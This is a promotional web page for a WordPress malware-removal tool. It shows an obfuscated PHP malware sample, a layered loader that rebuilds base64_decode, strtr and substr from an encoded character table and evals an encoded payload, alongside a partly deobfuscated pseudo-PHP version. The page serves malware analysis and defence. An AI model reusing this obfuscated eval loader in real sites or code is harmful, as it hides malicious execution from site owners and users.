Japanese English

PHP deobfuscation, decryption, reconstruction tool

De-obfuscate PHP malware/viruses and tampering code on Wordpress to original readable code.

*Please note that not all obfuscation codes can be decoded.

Decoded the code below.

<?php $O00OO0=urldecode("%6E1%7A%62%2F%6D%615%5C%76%740%6928%2D%70%78%75%71%79%2A6%6C%72%6B%64%679%5F%65%68%63%73%77%6F4%2B%6637%6A");$O00O0O=$O00OO0{3}.$O00OO0{6}.$O00OO0{33}.$O00OO0{30};$O0OO00=$O00OO0{33}.$O00OO0{10}.$O00OO0{24}.$O00OO0{10}.$O00OO0{24};$OO0O00=$O0OO00{0}.$O00OO0{18}.$O00OO0{3}...



Obfuscated php code

<?php $O00OO0=urldecode("%6E1%7A%62%2F%6D%615%5C%76%740%6928%2D%70%78%75%71%79%2A6%6C%72%6B%64%679%5F%65%68%63%73%77%6F4%2B%6637%6A");$O00O0O=$O00OO0{3}.$O00OO0{6}.$O00OO0{33}.$O00OO0{30};$O0OO00=$O00OO0{33}.$O00OO0{10}.$O00OO0{24}.$O00OO0{10}.$O00OO0{24};$OO0O00=$O0OO00{0}.$O00OO0{18}.$O00OO0{3}.$O0OO00{0}    
        .$O0OO00{1}.$O00OO0{24};$OO0000=$O00OO0{7}.$O00OO0{13};$O00O0O.=$O00OO0{22}.$O00OO0{36}    
        .$O00OO0{29}.$O00OO0{26}.$O00OO0{30}.$O00OO0{32}.$O00OO0{35}.$O00OO0{26}.$O00OO0{30};    
        eval($O00O0O("JE8wTzAwMD0iYmF5RmZRWGNJV3RDcWhSRWd3ek5ZR2lNc2tsS1VvbnZqU0FUSnBMZUhET21kdXJWUEJaeGRqQWZJWmNyRU5pUmxud2dMV1BRcHNYVk9UR1VKb1NDa3Z6QmFoRnFlSG15RGJ0S01ZeHVNSDlXamV6TFJYOENGdjBMNDRVUDQ0bW40NG1QNDRtRVJYd1BEZUVMTXZ6Uzc3QW43N0FYNzdBazc3QVQ3N0FHYVBPVWFzR2JEUno5RUhnQVZQWjdSTG9DVVhvVUVSb0w0NFVQNDRtbjQ0bVA0NG1FUlh6bEZXaGtkc2ZQckFZRWQyREdSU09VRVJ6TEVlWTFweXVocEFZUERzZjBqTlZMeFNLYnAzd2hkMjRMeFNLU3h2TFRyM3dBRlJ6VGpONTBVWm9MRVJ6THFXb0xFUnpMRVJ6TEVzR3lFUkxuZE5hSXIzd0Fkc0tiVVJ3UERlRWhVdlk3RXN3aHh2TFNhZVEwcmJtWWttcWhiYm1Zb21tUlhScmhtQVk5Ulh6TEVSekxFUnpMcnlLMERjYWJFczFYYzNRMHJTd0NkczkzeGNFb2FlUTByWFdMYTFLSndYMDRhQVRMRlhZUERlYTJwTldvYXNHYkRSemxFSFQ0UUFUN1JYekxFUlk5UlMwVVJTeG5yRzlURE4xV1VnbkN4Mko2bXl4MXgySm9hZVEwclhXTGFzR2JEUlRobUF6TEVSekNGQUhDQ3BlQ0NwRkNDcE1DQ3BCQ0NwSnVWa2czbUJKNCI7ICAKICAgICAgICBldmFsKCc/PicuJE8wME8wTygkTzBPTzAwKCRPTzBPMDAoJE8wTzAwMCwkT08wMDAwKjIpLCRPTzBPMDAoJE8wTzAwMCwkT08wMDAwLCRPTzAwMDApLCAgICAKICAgICAgICAkT08wTzAwKCRPME8wMDAsMCwkT08wMDAwKSkpKTs="));?>

Decoded(de-Obfuscated) php code

<?php

$O00OO0 = "n1zb/ma5\\vt0i28-pxuqy*6lrkdg9_ehcswo4+f37j";
$O00O0O = "base";
$O0OO00 = "strtr";
$OO0O00 = "substr";
$OO0000 = "52";
$O00O0O = "base64_decode";
eval {
    $O0O000 = "bayFfQXcIWtCqhREgwzNYGiMsklKUonvjSATJpLeHDOmdurVPBZxdjAfIZcrENiRlnwgLWPQpsXVOTGUJoSCkvzBahFqeHmyDbtKMYxuMH9WjezLRX8CFv0L44UP44mn44mP44mERXwPDeELMvzS77An77AX77Ak77AT77AGaPOUasGbDRz9EHgAVPZ7RLoCUXoUERoL44UP44mn44mP44mERXzlFWhkdsfPrAYEd2DGRSOUERzLEeY1pyuhpAYPDsf0jNVLxSKbp3whd24LxSKSxvLTr3wAFRzTjN50UZoLERzLqWoLERzLERzLEsGyERLndNaIr3wAdsKbURwPDeEhUvY7EswhxvLSaeQ0rbmYkmqhbbmYommRXRrhmAY9RXzLERzLERzLryK0DcabEs1Xc3Q0rSwCds93xcEoaeQ0rXWLa1KJwX04aATLFXYPDea2pNWoasGbDRzlEHT4QAT7RXzLERY9RS0URSxnrG9TDN1WUgnCx2J6myx1x2JoaeQ0rXWLasGbDRThmAzLERzCFAHCCpeCCpFCCpMCCpBCCpJuVkg3mBJ4";
    eval('?>' . base64_decode(strtr(substr($O0O000, 104), substr($O0O000, $OO0000, $OO0000), substr($O0O000, 0, $OO0000))));
};


Malware detection & removal plugin for WordPress

(C)2020 Wordpress Doctor All rights reserved.